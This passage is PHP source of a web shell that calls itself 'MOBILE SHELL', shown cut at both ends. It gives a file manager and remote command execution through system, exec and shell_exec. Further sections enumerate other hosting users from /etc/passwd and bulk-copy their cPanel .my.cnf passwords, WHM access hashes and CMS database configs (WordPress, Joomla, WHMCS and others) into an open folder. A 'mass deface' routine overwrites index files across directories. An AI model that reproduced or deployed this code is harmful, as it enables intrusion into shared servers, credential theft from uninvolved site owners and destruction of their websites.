405. echo "<th><a href='?command=view&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
406. <th><button class='coL-btn-option-active'><i class='fa fa-pencil'></i></button></th>
407. <th><a href='?command=rename&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
408. <th><a href='?command=chmod&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
409. <th><a href='?command=delete&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
410. $source = htmlspecialchars(@file_get_contents($_COEG['file']));
411. if(empty($source)) {
412.     echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."'  style='margin:0px'>
413.     <textarea name='src' placeholder='# Put your code here...' class='top'></textarea><br>
414. <input type='submit' class='btn-exe' value='Save' name='save' style='margin-top:3px;width: 100%'></form>";
415. } else { echo "<form method='post' action='?".x7."edit&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px'>
416.     <textarea name='src' class='top'>".$source."</textarea>
417. <input type='submit' value='Save' name='save' class='btn-exe' style='margin-top:3px;width: 100%'></form>";
418.   }
419. }
420.  
421. // --- view file --- //
422. elseif($_COEG['command'] == 'view') {
423. echo '<div class="coL-panel"><table>
424. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SOURCE VIEWER</td></table></div>';
425. echo '<div class="coL-option">';
426. echo '<table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="#FF000">[</font> '.basename($_COEG['file']).' <font color="#FF000">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
427. <hr>';
428. echo "<table><th><button class='coL-btn-option-active'><i class='fa fa-eye'></i></button></th>
429. <th><a href='?command=edit&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
430. <th><a href='?command=rename&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-edit'></i></button></a></th>
431. <th><a href='?command=chmod&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
432. <th><a href='?command=delete&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
433. $source = htmlspecialchars(@file_get_contents($_COEG['file']));
434. if(empty($source)) {
435.     $q1 = 'Source Not Found !!';
436.     failed1($q1);
437.     echo x9;
438. } else {
439.     echo "<pre class='top'><code class='php'>".$source."</code></pre>";
440.     }
441. }
442.  
443. // --- rename file --- //
444. elseif($_COEG['command'] == 'rename') {
445.         if($_COEG['rename']) {
446.         $rename = rename($_COEG['file'], "$dir/".htmlspecialchars($_COEG['rename'])."");
447.         if($rename) {
448. $q1 = "File Renamed !!";
449. $t1 = "?".x5.$dir;
450. fauto2($q1, $t1);
451.    } else {
452. $q1 = "Permission Denied !!";
453. $t1 = "?".x5.$dir;
454. fauto1($q1, $t1);
455.         }
456. }
457. echo '<div class="coL-panel"><table>
458. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">RENAME FILE</td></table></div>';
459. echo '<div class="coL-option"><table><td align="center" style="width:30px"><i class="fa fa-file-o"></i> </td><td class="break"><font color="#FF000">[</font> '.basename($_COEG['file']).' <font color="#FF000">]</font></td><td style="width:90px" class="coL-option-panel" align="center">'.$size.'</td></table>
460. <hr><table>';
461. echo "<th><a href='?command=view&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-eye'></i></button></a></th>
462. <th><a href='?command=edit&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-pencil'></i></button></a></th>
463. <th><button class='coL-btn-option-active'><i class='fa fa-edit'></i></button></th>
464. <th><a href='?command=chmod&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-cogs'></i></button></a></th>
465. <th><a href='?command=delete&dir=$dir&file=".$_COEG['file']."'><button class='coL-btn-option'><i class='fa fa-trash'></i></button></a></th></table></div>";
466. echo "<div class='coL-option top'>
467. <br><br><br>
468.     <center>
469.         <i class='fa fa-file-o fa-3x'></i></center><br><br>";
470. echo "<form action='?".x7."rename&".x5.$dir."&".x6.$_COEG['file']."' style='margin:0px' method='post'>
471. <table cellspacing='0'>
472.     <td align='center' style='width:10%'><i class='fa fa-file-o'></i> </td><td style='width:70%'><input type='text' value='".basename($_COEG['file'])."' name='rename'></td><td style='width:20%'>
473.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
474.     </form></div>";
475. }
476.  
477. // --- delete file --- //
478. elseif($_COEG['command'] == 'delete') {
479. $delete = unlink($_COEG['file']);
480. if($delete) {
481.         $q1 = '[ '.basename($_COEG['file']).' ] Deleted !!';
482.         $t1 = '?'.x5.$dir;
483.         fauto2($q1, $t1);
484.         echo x10;
485.     } else {
486.         $q1 = 'Permission Denied !!';
487.         $t1 = '?'.x5.$dir;
488.         fauto1($q1, $t1);
489.         echo x8;
490.     }
491. }
492.  
493. // --- rename directory --- //
494. elseif($_COEG['command'] == 'renadir') {
495.    $c = $_COEG['e'];
496.     if($_COEG['e']) {
497.         $e = rename($dir, "".dirname($dir)."/".htmlspecialchars($_COEG['e'])."");
498.         if($e) {
499. $q1 = 'Directory Renamed !!';
500. $t1 = '?'.x5.dirname($dir);
501. fauto2($q1, $t1);
502.     } else {
503. $q = 'Permission Denied !!';
504. failed1($alert);
505.     }
506. }
507. echo('<div class="coL-panel"><table>
508. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">RENAME DIRECTORY</td></table></div>');
509. echo("<div class='coL-option top'>
510. <br><br><br>
511.     <center>
512.         <i class='fa fa-folder-o fa-3x'></i></center><br><br>");
513. echo("<form action='?".x7."renadir&".x5.$dir."' style='margin:0px' method='post'>
514. <table cellspacing='0'>
515.     <td align='center' style='width:10%'><i class='fa fa-folder-o'></i> </td><td style='width:70%'><input type='text' value='".basename($dir)."' name='e'></td><td style='width:20%'>
516.     <button type='submit' class='btn-exe'><i class='fa fa-arrow-circle-right'></i></button></td></table>
517.     </form></div>");
518. }
519.  
520. // --- delete directory --- //
521. elseif($_COEG['command'] == 'deledir') {
522. $x0z1 = deledir($dir);
523.  if($x0z1) {
524.         echo "<script>window.location = '?".x5.dirname($dir)."';</script>";
525.         $q1 = 'Success !!';
526.     success1($q1);
527.     } else {
528.         echo "<script>window.location = '?".x5.dirname($dir)."';</script>";
529.         $q1 = 'Permission Denied !!';
530.     failed1($q1);
531.     }
532. }
533.  
534. // --- multiple upload --- //
535. elseif($_COEG['command'] == 'upload') {
536. echo '<div class="coL-panel"><table>
537. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MULTIPLE UPLOAD</td></table></div>';
538. if(isset($_REQUEST['ufile'])) {
539. $ufile = $_COEG['ufile'] ;
540. }
541. if(isset($_REQUEST['upload'])) {
542. if($_COEG['upload']){
543. if(empty($ufile)) {
544.     $cx = $_FILES['file']['name'];
545. } else {
546.     $cx = $ufile;
547. }
548. if(@copy($_FILES['file']['tmp_name'],$dir.'/'.$cx)) {
549. $q1 ="File Uploaded !!";
550. success1($q1); } else {
551. $q1 ="Upload Failed !!";
552. failed1($q1);
553.           } } }
554. echo '<div class="coL-option"><span class="label-default">+</span> Upload From Device :<hr>';
555. echo '<form enctype="multipart/form-data" action="?'.x7.'upload&'.x5.$dir.'"   method="POST" style="margin:0px">
556. <table style="width:100%">
557. <td style="width:20%">File :</td>
558. <td style="width:80%">
559. <input type="file" name="file"></td>
560. <tr>
561. <td style="width:20%">Name :</td>
562. <td style="width:80%"><input name="ufile" type="text" placeholder="" value="" /></td>
563. <tr>
564. <td style="width:20%"></td>
565. <td style="width:80%"><input type="submit" name="upload" style="width:100px" value="Upload" class="btn-exe" />
566. </td></table></form></div>';
567.  
568. if($_COEG["submit"]){
569. $uname = $_COEG["uname"];
570. $url = trim($_COEG["url"]);
571. if($url){
572. $file = fopen($url,"rb");
573. if($file) {
574. $valid_exts = array("css","php","html","htm","txt","zip","rar","png","jpg","jpeg","gif","mp3","mp4","3gp");
575. $ext = end(explode(".",strtolower(basename($url))));
576. if(in_array($ext,$valid_exts)){
577. if(empty($uname)) {
578.      $filename = basename($url);
579.  } else {
580.     $filename = $uname;
581. }
582. $newfile = fopen($dir.'/'.$filename, "wb");
583. if($newfile){
584. while(!feof($file)) {
585. fwrite($newfile,fread($file,MS7Z), MS7Z);  } $q1 ="File Upoaded !!";
586. success1($q1); } else {
587. $q1 ="Upload Failed !!";
588. failed1($q1); } } else { $q1 ="Extension Not Supported !!";
589. failed1($q1); } } else { $q1 ="Link Invalid !!";
590. failed1($q1); } } else { $q1 ="Link Empty !!";
591. failed1($q1); } }
592. echo '<div class="coL-option top"><span class="label-default">+</span> Upload From Internet :<hr>';
593. echo '<form action="?'.x7.'upload&'.x5.$dir.'"  method="POST">';
594. echo '<table style="width:100%">
595. <td style="width:20%">Link :</td>
596. <td style="width:80%"><input type="text" name="url" placeholder="" style="width:100%"></td>
597. <tr>
598. <td style="width:20%">Name :</td>
599. <td style="width:80%"><input type="text" name="uname" style="width:100%"></td>
600. <tr>
601. <td style="width:20%"></td><td style="width:80%"><input type="submit" name="submit" style="width:100px" value="Upload" class="btn-exe"></td></table></form>
602. </div>';
603. }
604.  
605. // --- system information --- //
606. elseif ($_COEG['command'] == 'system') {
607. function exe($ms_x) {  
608. if(function_exists('system')) {        
609.         @ob_start();       
610.         @system($ms_x);        
611.         $ms_z = @ob_get_contents();        
612.         @ob_end_clean();       
613.         return $ms_z;  
614.     } elseif(function_exists('exec')) {        
615.         @exec($ms_x,$values);      
616.         $ms_z = "";        
617.         foreach($values as $value) {           
618.             $ms_z .= $result;      
619.         } return $ms_z;    
620.     } elseif(function_exists('passthru')) {        
621.         @ob_start();       
622.         @passthru($ms_x);      
623.         $ms_z = @ob_get_contents();        
624.         @ob_end_clean();       
625.         return $ms_z;  
626.     } elseif(function_exists('shell_exec')) {      
627.         $ms_z = @shell_exec($ms_x);        
628.         return $ms_z;  
629.     }
630. }
631. function disk($dz) {
632. if($dz >= 1073741824)
633. return sprintf('%1.2f',$dz / 1073741824 ).' GB';
634. elseif($dz >= 1048576)
635. return sprintf('%1.2f',$dz / 1048576 ) .' MB';
636. elseif($dz >= 1024)
637. return sprintf('%1.2f',$dz / 1024 ) .' KB';
638. else
639. return $dz .' B';
640. }
641. function fuck($b_ms, $c_ms, $d_ms){
642.     if(strpos($b_ms, $c_ms) === FALSE) return FALSE;
643.     if(strpos($b_ms, $d_ms) === FALSE) return FALSE;
644.     $a_ms = strpos($b_ms, $c_ms) + strlen($c_ms);
645.     $e_ms = strpos($b_ms, $d_ms, $a_ms);
646.     $f_ms = substr($b_ms, $a_ms, $e_ms - $a_ms);
647.     return $f_ms; }
648. if(get_magic_quotes_gpc()) {
649. function m_ms($n_ms) {
650. return is_array($n_ms) ? array_map('m_ms', $n_ms) : stripslashes($n_ms); }
651. $_COEG = m_ms($_COEG); }
652.  
653. $safemode = (@ini_get(strtolower("safe_mode")) == 'on') ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
654.  
655. $disablefunc = @ini_get("disable_functions");
656. $mysql = (function_exists('mysql_connect')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
657.  
658. $curl = (function_exists('curl_version')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
659.  
660. $wget = (exe('wget --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
661.  
662. $perl = (exe('perl --help')) ? "<span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</font>";
663.  
664. $python = (exe('python --help')) ? "
665. <span class='label label-success'>ON</span>" : "<span class='label label-danger'>OFF</span>";
666.  
667. $ds_men = (!empty($disablefunc)) ? "<span class='label-danger'>".$disablefunc."</span>" : "<span class='label-success'>NONE</span>";
668. if(!function_exists('posix_getegid')) {
669.     $c_us = @get_current_user();
670.     $c_id = @getmyuid();
671.     $g_c = @getmygid();
672.     $gr_p = "?";
673. } else {
674.     $c_id = @posix_getpwuid(posix_geteuid());
675.     $g_c = @posix_getgrgid(posix_getegid());
676.     $c_us = $c_id['name'];
677.     $c_id = $c_id['uid'];
678.     $gr_p = $g_c['name'];
679.     $g_c = $g_c['gid'];
680. }
681. echo '<div class="coL-panel"><table>
682. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">SYSTEM INFORMATION</td></table></div>';
683. echo "<table width=100% class='table-info' cellspacing=0>
684. <th class=th-info style=width:120px><center>Component</center></th>
685. <th class=th-info><center>Arrow</center></th>
686. <th class=th-info break><center>Result</center></th></tr>";
687. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Server </td><td class='td-info' align='center'>&raquo;</td>
688. <td class='td-info'> ".$_SERVER['SERVER_SOFTWARE']."</td></tr>";
689. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
690. Username</td><td class='td-info' align='center'>&raquo;</td>
691. <td class='td-info'> ".$c_us." [".$c_id."]</td></tr>";
692. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
693. Group</td><td class='td-info' align='center'>&raquo;</td>
694. <td class='td-info'>".$gr_p." [".$g_c."]</td></tr>";
695. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
696. Server IP </td><td class='td-info' align='center'>&raquo;</td>
697. <td class='td-info'>".gethostbyname($_SERVER['HTTP_HOST'])."</td></tr>";
698. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
699. Your IP </td><td class='td-info' align='center'>&raquo;</td>
700. <td class='td-info'> ".$_SERVER['REMOTE_ADDR']."</td></tr>";
701. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
702. PHP Version</td><td class='td-info' align='center'>&raquo;</td>
703. <td class='td-info'> ".@phpversion()."</td></tr>";
704. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Disk Space</td> <td class='td-info' align='center'>&raquo;</td>
705. <td class='td-info'>[".disk(disk_free_space("/"))."] / [".disk(disk_total_space("/"))."]</td></tr>";
706. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Safe Mode</td><td class='td-info' align='center'>&raquo;</td>
707. <td class='td-info'> $safemode</td></tr>";
708. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> MySQL</td><td class='td-info' align='center'>&raquo;</td><td class='td-info'>$mysql</td></tr>";
709. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span>
710. Perl</td><td class='td-info' align='center'>&raquo;</td>
711. <td class='td-info'> $perl </td></tr>";
712. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> Python</td><td class='td-info' align='center'>&raquo;</td>
713. <td class='td-info'>$python</td></tr>";
714. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> WGET</td><td class='td-info' align='center'>&raquo;</td>
715. <td class='td-info'>$wget</td></tr>";
716. echo "<tr class='ex-hov'><td class='td-info'><span class='label label-default'>+</span> CURL</td><td class='td-info' align='center'>&raquo;</td><td class='td-info'>$curl</td></tr>";
717.  if(get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") {
718.   echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes  </td><td class='td-info' align='center'>&raquo;</td>
719. <td><span class='label label-success'>ON</span></tr>"; } else { echo "<tr class='ex-hov'><td align='left' class='td-info'><span class='label label-default'>+</span> Magic Quotes  </td><td class='td-info' align='center'>&raquo;</td><td class='td-info'><span class='label label-danger'>OFF</span></td></tr>"; }
720. echo "</table>";  
721. echo '<div class="coL-panel top"><table>
722. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">KERNEL</td></table></div>';
723. echo "<div class ='coL-option' style='margin-bottom:3px;padding:7px'>".php_uname()."</div>";
724. echo '<div class="coL-panel top"><table>
725. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">DISABLE FUNCTION</td></table></div>';
726. echo "<div class='coL-option' style='padding:7px'>".$ds_men."</div>";
727. }
728.  
729. // --- jumping server --- //
730. elseif($_COEG['command'] == 'jumping') {
731. echo '<div class="coL-panel"><table>
732. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">JUMPING SERVER</td></table></div>';
733. $i = 0;
734. $s_a = fopen("/etc/passwd", "r");
735. while($s_b = fgets($s_a)) {
736.     if($s_b == '' || !$s_a) {
737.          $q1 = "Can't Read [ /etc/passwd ]";
738.                  $t1 = "?".x5.$dir;
739.                  fauto1($q1, $t1);
740.                  echo x9;
741.     } else {
742.         preg_match_all('/(.*?):x:/', $s_b, $s_c);
743.         foreach($s_c[1] as $s_d) {
744.             $s_e = "/home/$s_d/public_html";
745.             if(is_readable($s_e)) {
746.                 $i++;
747.                 $s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-file'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'> <a href='?dir=$s_e'>[ $s_d ]</a></td>";
748.                 if(is_writable($s_e)) {
749.                     $s_o = "<table style='width:100%' class='table-info' cellspacing='0'><td style='width:120px' class='td-info'><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'>
750.                      <a href='?dir=$s_e'><font color='red'>[ $s_d ]</font></a></td>";
751.                 }
752.                 echo $s_o;
753.                 $s_k = file_get_contents("/etc/named.conf");   
754.                 if($s_k == '') {
755.                      $q1 = "Server Not Found !!";
756.                      $t1 = "?".x5.$dir;
757.                      fauto1($q1, $t1);
758.                       echo x9;
759.                 } else {
760.                     preg_match_all("#/var/named/(.*?).db#", $s_k, $s_v);
761.                     foreach($s_v[1] as $s_x) {
762.                         $s_g = posix_getpwuid(@fileowner("/etc/valiases/$s_x"));
763.                         $s_g = $s_g['name'];
764.                         if($s_g == $s_d) {
765.                             echo "<td class='td-info'><a href='http://$s_x'>http://$s_x</a> </td></table>"; break;}}}}}}}
766. if($i == 0) {
767.          $q1 = "Server Not Found !!";
768.          $t1 = "?".x5.$dir;
769.          fauto1($q1, $t1);
770.          echo x9;
771. } else {
772.     echo "<div class='coL-option top'>Total : <span class='label label-default'> ".$i." <span></div>";
773.     }
774. }
775.  
776. // --- config grabber --- //
777. elseif($_COEG['command'] == 'config') {
778.     $s_t = fopen("/etc/passwd", "r");
779.     $s_z = mkdir("underxploit-config", 0777);
780.     $s_s = "Options all\
781. Require None\
782. Satisfy Any";
783.     $s_d = fopen("underxploit-config/.htaccess","w");
784.     fwrite($s_d, $s_s);
785.     while($s_q = fgets($s_t)) {
786.         if($s_q == "" || !$s_t) {
787.             $q1 = 'Can\'t Read etc/passwd !!';
788.             failed1($q1);
789.         } else {
790.             preg_match_all('/(.*?):x:/', $s_q, $s_y);
791.             foreach($s_y[1] as $s_p) {
792.                 $s_k = "/home/$s_p/public_html/";
793.                 if(is_readable($s_k)) {
794.                     $s_g = array(
795.                         "/home/$s_p/.my.cnf" => "cpanel",
796.                         "/home/$s_p/.accesshash" => "WHM-accesshash",
797.                         "/home/$s_p/public_html/bw-configs/config.ini" => "BosWeb",
798.                         "/home/$s_p/public_html/config/koneksi.php" => "Lokomedia",
799.                         "/home/$s_p/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
800.                         "/home/$s_p/public_html/clientarea/configuration.php" => "WHMCS",
801.                         "/home/$s_p/public_html/whm/configuration.php" => "WHMCS",
802.                         "/home/$s_p/public_html/whmcs/configuration.php" => "WHMCS",
803.                         "/home/$s_p/public_html/forum/config.php" => "phpBB",
804.                         "/home/$s_p/public_html/sites/default/settings.php" => "Drupal",
805.                         "/home/$s_p/public_html/config/settings.inc.php" => "PrestaShop",
806.                         "/home/$s_p/public_html/app/etc/local.xml" => "Magento",
807.                         "/home/$s_p/public_html/joomla/configuration.php" => "Joomla",
808.                         "/home/$s_p/public_html/configuration.php" => "Joomla",
809.                         "/home/$s_p/public_html/wp/wp-config.php" => "WordPress",
810.                         "/home/$s_p/public_html/wordpress/wp-config.php" => "WordPress",
811.                         "/home/$s_p/public_html/wp-config.php" => "WordPress",
812.                         "/home/$s_p/public_html/admin/config.php" => "OpenCart",
813.                         "/home/$s_p/public_html/slconfig.php" => "Sitelok",
814.                         "/home/$s_p/public_html/application/config/database.php" => "Ellislab");
815.                     foreach($s_g as $s_h => $s_l) {
816.                         $s_r = file_get_contents($s_h);
817.                         if($s_r == '') {
818.                         } else {
819.                             $fcS = fopen("underxploit-config/$s_p-$s_l.txt","w");
820.                             fputs($fcS,$s_r);
821.                         }}}}}}
822. $q1 = "OK !!";
823. $t1 = "?".x5.$dir."/underxploit-config";
824. fauto2($q1, $t1);    
825. echo x10;  
826. }
827.  
828. // --- file grabber --- //
829. elseif($_COEG['command'] == 'filegrab') {
830. echo '<div class="coL-panel"><table>
831. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">FILE GRABBER</td></table></div>';
832. if($_COEG['grab']) {
833. $name = $_COEG['name'];
834. $rz = $_COEG['link'];
835. $x = file_get_contents($rz);
836. if(empty($x)) {
837. $q1 = 'Can\'t Grab File !!';
838. failed1($q1);
839. } else { $q1 = 'Done !!';
840. success1($q1);
841. $fp = fopen($dir."/".$name, "w");
842. fwrite($fp, $x);
843. fclose($fp);
844. echo '<meta http-equiv="Refresh" content="0; URL=?dir='.$dir.'">'; } }
845. echo "<div class='coL-option top'>
846. File Grabber :<hr>
847. <form action='?".x7."filegrab&".x5.$dir."' method='post'>
848. <table cellspacing='0'>
849.     <td style='width:20%'>Link :</td><td style='width:80%'>
850.     <input type='text' value='' name='link' style='width:100%'></td><tr>
851.     <td style='width:20%'>Name :</td><td style='width:80%'>
852.     <input type='text' value='' id='name' name='name' style='width:100%'></td><tr>
853.     <td style='width:20%'></td><td style='width:80%'>
854.     <input type='submit' onclick='saveForm();return false;' class='btn-exe' value='Grab It !' name='grab' style='width:100px'></td></table></form></div>";
855. echo '<script>function saveForm(){
856. if(document.getElementById("name").value == ""){
857.      $.alert ({
858.         icon: "fa fa-code",
859.         title: "MOBILE SHELL",
860.         content: "Can\'t Be Empty !!",
861.         theme: "Dark",
862.         type: "red",
863.         });
864.      return false;
865.    }
866.    document.getElementById("sks").submit();
867.  }
868. </script>';
869. }
870.  
871. // --- cpanel finder  --- //
872. elseif($_COEG['command'] == 'cpanel') {
873. echo '<div class="coL-panel"><table>
874. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">CPANEL FINDER</td></table></div>';
875. @ini_set('display_errors',0);
876. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
877.     $ar0=explode($marqueurDebutLien, $text);
878.     $ar1=explode($marqueurFinLien, $ar0[$i]);
879.     return trim($ar1[0]);
880. }
881. $d0mains = @file('/etc/named.conf');
882. $domains = scandir("/var/named");
883. if ($domains or $d0mains) {
884.     $domains = scandir("/var/named");
885.     if($domains) {
886. echo "<table class='table-info' style='width:100%'><th class='th-info'> <center>Domain</center> </th><th class='th-info'> <center>Result</center></th></tr>";
887. $count=1;
888. $dc = 0;
889. $list = scandir("/var/named");
890. foreach($list as $domain){
891. if(strpos($domain,".db")){
892. $domain = str_replace('.db','',$domain);
893. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
894. $dirz = '/home/'.$owner['name'].'/.my.cnf';
895. $path = getcwd();
896. if (is_readable($dirz)) {
897. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
898. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
899. $password=entre2v2($p,'password="','"');
900. echo "<tr>
901. <td class='td-info' style='width:150px'><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td>
902. <td class='td-info'><a class='a' href='".$owner['name'].".txt' target='_blank'>OPEN</a></td></tr>";
903. $dc++; }}}
904. echo '</table>';
905. $total = $dc;
906. echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
907. }else{
908. $d0mains = @file('/etc/named.conf');
909.     if($d0mains) {
910. echo "<table class='table-info' style='width:100%'><tr><th class='th-info'> <center>Domain</center> </th><th class='th-info'> <center>Result</center> </th></tr>";
911. $count=1;
912. $dc = 0;
913. $mck = array();
914. foreach($d0mains as $d0main){
915.     if(@eregi('zone',$d0main)){
916.         preg_match_all('#zone "(.*)"#',$d0main,$domain);
917.         flush();
918.         if(strlen(trim($domain[1][0])) >2){
919.             $mck[] = $domain[1][0];
920.         } } }
921. $mck = array_unique($mck);
922. $usr = array();
923. $dmn = array();
924. foreach($mck as $o) {
925.     $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
926.     $usr[] = $infos['name'];
927.     $dmn[] = $o;
928. }
929. array_multisort($usr,$dmn);
930. $dt = file('/etc/passwd');
931. $passwd = array();
932. foreach($dt as $d) {
933.     $r = explode(':',$d);
934.     if(strpos($r[5],'home')) {
935.         $passwd[$r[0]] = $r[5];
936.     }
937. }
938. $l=0;
939. $j=1;
940. foreach($usr as $r) {
941. $dirz = '/home/'.$r.'/.my.cnf';
942. $path = getcwd();
943. if (is_readable($dirz)) {
944. copy($dirz, $path.'/'.$r.'.txt');
945. $p=file_get_contents($path.'/'.$r.'.txt');
946. $password=entre2v2($p,'password="','"');
947. echo "<tr>
948. <td class='td-info'><a target='_blank' href=http://".$dmn[$j-1]."/>".$dmn[$j-1]." </a></td>
949. <td class='td-info'><a href='".$r.".txt'>OPEN</a> </center></td></tr>";
950. $dc++;
951.                 flush();
952.                 $l=$l?0:1;
953.                 $j++;
954.         }
955.     }
956. }
957. echo '</table>';
958. $total = $dc;
959. echo '<div class="coL-option top" style="">Total Cpanel : <span class="label label-default">'.$total.'</span></div>';
960.     }
961. } else{
962.     $q1 = 'Access Disabled !!';
963.     $t1 = '?'.x5.$dir;
964.     fauto1($q1, $t1);
965.     echo x9;
966.     }
967. }
968.  
969. // --- mass deface --- //
970. elseif ($_COEG['command'] == 'massdef') {
971. echo '<div class="coL-panel"><table>
972. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MASS DEFACE</td></table></div>';
973. echo '<div class="coL-option">';
974. echo "<form action='?".x7."massdef&".x5.$dir."' method='post'>";
975. echo "<table cellspacing='0'>
976. <td align='left' style='padding:7px;width:60px'>
977. Root :</td><td><input type='text' name='base_dir' style='width:100%' value='".getcwd()."'></td></tr>";
978. echo "<tr><td align='left' style='padding:7px;width:60px'>File :</td><td> <input type='text' name='file_name' value='index.php' style='width:100%' placeholder=''></td></tr></table>";
979. echo "<br>Source :<br><br>
980. <textarea name='index'># Hacked By Wildan Izzudin !!</textarea>";
981. echo "<input type='submit' value='CROT' class='btn-exe' style='width:100%;margin-top:3px'></form></center></div>";
982. if (isset ($_COEG['base_dir']))
983. {
984.         if (!file_exists ($_COEG['base_dir'])) {
985.  $alert = "Destination Not Found !";
986.  failed1($alert); }
987.         @chdir ($_COEG['base_dir']) or die ("<script>alert('Cannot Open Directory');</script>");
988.  
989.         $files = @scandir ($_COEG['base_dir']) or die ("Oh Shit !!<br>");
990.         foreach ($files as $file):
991.                 if ($file != "." && $file != ".." && @filetype ($file) == "dir")
992.                 {
993.                         $index = getcwd ()."/".$file."/".$_COEG['file_name'];
994.                         if (file_put_contents ($index, $_COEG['index']))
995.                                 echo "
996.                <div class='coL-option' style='margin-top:2px;margin-bottom:2px'><span class='label-default'>+</span>   $index </span></div>"; }
997.         endforeach;
998.     }
999. }
1000.  
1001. // --- md5 creator --- //
1002. elseif($_COEG['command'] == 'md5') {
1003. echo('<div class="coL-panel"><table>
1004. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MD5 CREATOR</td></table></div>');
1005. if($_COEG['encrypt']) {
1006. $text = $_COEG['text'];
1007. $md5 = md5($text);
1008. if($md5) {
1009. echo("<div class='coL-option top'><table style='margin-bottom:3px'>
1010. <td class='td-md5' style='width:60px'><font color='#1D9D73'>+</font> Text :</td><td class='break'> ".$text."</td><tr><td class='td-md5' style='width:60px'><font color='#1D9D73'>+</font> MD5 :</td><td class='break'> ".$md5."</td></table></div>"); } else {
1011. $alert = 'Permission Denied !!';
1012. failed($alert);
1013.     }
1014. }
1015. echo("<div class='coL-option top'>
1016.     <form action='?".x7."md5&".x5.$dir."' method='post'>
1017. <table style='width:100%'>
1018.     <td style='width:20%'>Text :</td><td style='width:80%'>
1019.     <input type='text' name='text' style='width:100%'>
1020. </td><tr><td style='width:20%'></td><td style='width:80%'>
1021.     <input type='submit' value='Create' name='encrypt' class='btn-exe' style='width:100px'></td></table></form></div>");
1022. }
1023.  
1024. // --- multi symlink --- //
1025. elseif($_COEG['command'] == 'symlink') {
1026. echo '<div class="coL-panel"><table>
1027. <td class="td-panel"><i class="fa fa-code"></i></td><td class="td-panel-right">MULTI SYMLINK</td></table></div>';
1028. if(is_readable("/etc/named.conf")) {
1029.     $named = '<a href="?symlink=named.conf&dir='.$dir.'">OPEN</a>';
1030.     } else {
1031.     $named = '<font color="red">DISABLED</font>';
1032. }
1033. if(is_readable("/etc/valiases")) {
